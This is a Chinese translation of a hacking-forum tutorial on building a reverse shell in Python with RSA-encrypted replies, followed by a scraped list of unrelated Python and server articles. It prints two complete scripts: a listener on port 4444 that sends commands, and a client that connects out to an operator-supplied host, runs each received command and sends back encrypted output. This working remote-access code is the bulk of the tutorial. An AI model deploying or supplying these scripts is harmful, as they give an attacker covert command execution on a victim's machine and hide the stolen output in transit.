使用RSA加密在Python中逆向shell
使用RSA加密在Python中逆向shell
这是一个关于使用RSA加密编程逆向shell的python教程。 我想提一下,这篇文章更多的是关于理解shell中涉及的加密而不是shell本身。 github的链接是https://github.com/ca10x/RSA-reverse-shell
侦听器
首先,我们需要一个侦听器来处理所有传入的连接。 这是listener_rsa.py的代码
- #!/usr/bin/python
- from Crypto.PublicKey import RSA
- from Crypto import Random
- from Crypto.Hash import SHA256
- import socket
- from thread import *
- import sys
- import pickle
- #Generate public key and private key
- random_generator = Random.new().read
- key = RSA.generate(2048, random_generator)
- public_key = key.publickey()
- #Create socket and bind to accept connections
- s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- try:
- s.bind(("0.0.0.0", 4444))
- except socket.error, v:
- print "Binding failed. Error code : " + str(v[0]) + " Message " + v[1]
- sys.exit()
- print "Socket bind complete"
- s.listen(2)
- print "[+] Listening to the incoming connection on port 4444..."
- def clientthread_sendpublickey(client) :
- client.send(pickle.dumps(public_key))
- def clienthandle(client) :
- while True :
- command = raw_input('~$ ')
- client.send(command)
- if command == 'quit' :
- break
- buf = client.recv(2048)
- encreply = pickle.loads(buf)
- print key.decrypt(encreply)
- while True:
- (client, (ip, port)) = s.accept()
- print "Received connection from : ", ip
- start_new_thread(clientthread_sendpublickey, (client,))
- print "Public Key sent to", ip
- start_new_thread(clienthandle, (client,))
我在Python中使用PyCrypto模块进行加密。 继续安装它。 我建议使用pip来安装模块。
$ sudo pip install pycrypto
在我们进入代码之前,让我向你解释一下RSA加密及其密钥。 RSA是一种非对称加密标准。 它有两个键,公共和私有。 简单来说,公钥用于加密消息,私钥用于解密。 下面是描述该过程的框图
如果你对RSA的数学工作感兴趣,那么我建议你阅读http://mathworld.wolfram.com/RSAEncryption.html(当心,仅限极客)
在上面的程序中,首先生成密钥,该密钥也是私钥。
key = RSA.generate(2048, random_generator)
函数RSA.generate有两个参数,第一个是以位为单位的密钥的大小,第二个是通常使用python随机函数生成的随机数。 在创建私钥之后,从中提取公钥并将其存储在变量中以供将来使用。
public_key = key.publickey()
使用套接字模块创建套接字,这相对简单。 你可以参考Python套接字1的官方文档,甚至可以进行简单的Google搜索。
套接字绑定并等待连接传入连接。
注 - 如果要将Linux中的套接字绑定到小于1024的端口,则必须以root身份执行该脚本。
当收到连接时,初始化新线程以将生成的公钥发送到客户端,以便它可以加密回复。
- def clientthread_sendpublickey(client) :
- client.send(pickle.dumps(public_key))
我们为什么要用Pickle? Pickle用于序列化和反序列化python对象。 由于public_key不是常规字符串,因此必须对其进行pickle,然后将其发送到接收方。
警告 - pickle模块不能防止错误或恶意构造的数据。 切勿取消从不受信任或未经身份验证的来源收到的数据。
一旦发送了公钥,另一个线程clienthandle(客户端)被初始化为True:loop,它发送给接收者的命令。 接收器运行命令并使用公钥加密输出。 然后将输出的pickle发送给监听器。
回复是unpickled,使用私钥解密并打印在屏幕上。
- encreply = pickle.loads(buf)
- print key.decrypt(encreply)
如果给出'quit'命令,则终止连接。
反向shell
让我们转到反向shell所在的接收器端。 reverse_shell_rsa的脚本如下所示
- #!/usr/bin/python
- import socket, subprocess, sys
- from Crypto.PublicKey import RSA
- from Crypto.Hash import SHA256
- import pickle
- RHOST = sys.argv[1]
- RPORT = 4444
- s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- s.connect((RHOST, RPORT))
- def receive_key():
- data_key = s.recv(1024)
- return data_key
- pickled_publickey = receive_key()
- public_key = pickle.loads(pickled_publickey)
- while True :
- command = s.recv(1024)
- if command == 'quit' :
- break
- reply = subprocess.Popen(str(command), shell=False, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
- stdout, stderr = reply.communicate()
- en_reply = public_key.encrypt(stdout, 32)
- s.send(pickle.dumps(en_reply))
- s.close()
一如既往,导入必要的模块。 要连接的IP地址作为参数提供,并存储在RHOST变量中。 创建套接字并与服务器(侦听器)建立连接。 一旦接受连接,服务器就会发送公钥(在listener.py脚本中向上滚动到clientthread_sendpublickey()),该公钥通过函数receive_key()接收并去除(记住pickling?)以获取公钥。
- def receive_key():
- data_key = s.recv(1024)
- return data_key
- pickled_publickey = receive_key()
- public_key = pickle.loads(pickled_publickey)
一段时间初始化True循环以保持连接的持久性并接收命令。 如果命令是“退出”,则节目结束。 否则,给定的命令作为子进程和标准输出运行,标准错误通过管道传递给变量'reply'。 然后使用公钥对标准输出进行加密,pickling并发送到服务器。
- en_reply = public_key.encrypt(stdout, 32)
- s.send(pickle.dumps(en_reply))
然后耐心等待,直到下一个命令。
重要的提示
这种方法是'教科书RSA'的实现。 对于真实世界的实现,你必须添加填充,例如PKCS1_OAEP。
RSA速度慢很多,一次只能加密256个字节。 你为什么问? 因为n的值是2048和2048/8 = 256.如果添加填充,阈值将降低,因为它占用了更多的字节。
解决方法是RSA应该通过AES使用。
我将在下一篇文章中解释这个概念。 由于这是我的第一篇文章,欢迎并感谢你的反馈。
新年快乐的人们!
问候,
作者: Cal0X
翻译:i春秋翻译小组-Neo(李皓伟)
责任编辑:F0rmat
翻译来源:https://0x00sec.org/t/reverse-shell-in-python-with-rsa-encryption/1414
使用RSA加密在Python中逆向shell的更多相关文章
- python中写shell(转)
python中写shell,亲测可用,转自stackoverflow To run a bash script, copy from stackoverflow def run_script(scri ...
- python中执行shell的两种方法总结
这篇文章主要介绍了python中执行shell的两种方法,有两种方法可以在Python中执行SHELL程序,方法一是使用Python的commands包,方法二则是使用subprocess包,这两个包 ...
- python中执行shell命令的几个方法小结(转载)
转载:http://www.jb51.net/article/55327.htm python中执行shell命令的几个方法小结 投稿:junjie 字体:[增加 减小] 类型:转载 时间:2014- ...
- 【python中调用shell命令使用PIPE】使用PIPE作为stdout出现假卡死的情况——将stdout重定向为输出到临时文件
在Python中,调用:subprocess.Popen(cmd, stdout = PIPE, stderr = PIPE, shell= true)的时候,如果调用的shell命令本身在执行之后会 ...
- javascript的rsa加密和python的rsa解密
先说下目前测试情况:javascript加密后的数据,python无法完成解密,我估计是两者的加密解密方法不同 1.看了这篇文章:http://blog.nsfocus.net/python-js-e ...
- [Python]在python中调用shell脚本,并传入参数-02python操作shell实例
首先创建2个shell脚本文件,测试用. test_shell_no_para.sh 运行时,不需要传递参数 test_shell_2_para.sh 运行时,需要传递2个参数 test_shell ...
- python 中调用shell命令
subprocess模块 根据Python官方文档说明,subprocess模块用于取代上面这些模块.有一个用Python实现的并行ssh工具—mssh,代码很简短,不过很有意思,它在线程中调用sub ...
- 「Python」6种python中执行shell命令方法
用Python调用Shell命令有如下几种方式: 第一种: os.system("The command you want"). 这个调用相当直接,且是同步进行的,程序需要阻塞并等 ...
- python中执行shell命令的几个方法小结
原文 http://www.jb51.net/article/55327.htm 最近有个需求就是页面上执行shell命令,第一想到的就是os.system, os.system('cat /proc ...
随机推荐
- Ajax 统一处理token失效
complete:function ajax 请求完成激活本事件.这个方法很方便完成ajax 异常的处理. $.ajaxSetup({ contentType:"application/x- ...
- OpenStack基础组件安装keystone身份认证服务
域名解析 vim /etc/hosts 192.168.245.172 controller01 192.168.245.171 controller02 192.168.245.173 contro ...
- python3 函数注意要点
一.定义一个函数: def test(): #用def关键词开头 print('*****') def test2(a,b): #a,b为形参 print(a,b) return a,b # retu ...
- centos修改SSH端口并禁用root远程登录
1.使用 root 用户执行以下步骤:只在 CentOS 6.5 下验证. 2.先查看下服务器端口号范围: # sysctl -a|grep ip_local_port_range 3.修改端口 vi ...
- struts2-剩余
一.说明 类型转换.输入验证(前台和后台)(validate().validateXXX().xml) 标签.上传下载.i18n(国际化).ognl(#reqeust.name) 注解方式.log4j ...
- 修改MySQL的数据目录
环境:CentOS Linux release 7.1.1503 (Core) 1. 安装MYSQL wget http://dev.mysql.com/get/mysql-community-rel ...
- Ubuntu 18.04 安装MySQL
最近在写东西的时候,需要用到MySQL,在网上查了一下,都说Ubuntu18.04不能安装MySQL5.7.22, 总觉的不可能,所以自己就研究了一下,然后分享给大家 工具/原料 VMware W ...
- 想明白为什么C->D
C公司为什么不行? 钱不够 第一个原因是在新世界,C能够给我的钱是远远低于市场价的.如果按照现公司的行情,也就一个社招人员的白菜价. 领导不行 C公司的领导,从面相上看就无法让我信服.领导力中下,忽悠 ...
- 在Windows Server2016中安装SQL Server2016
SQL Server2016安装硬.软件条件:点击打开链接 WinServer2016的安装参见: 在虚拟机中安装Windows Server2016 1. SQL Server2016下载地址: - ...
- javascript中所有函数参数都是按值传递
在看<JavaScript高级程序设计>(第三版)的时候,传递参数这一节,里面提到 ECMAScript中所有函数的参数都是按值传递的 它自己的解释是, 把函数外部的值复制给函数内部的参数 ...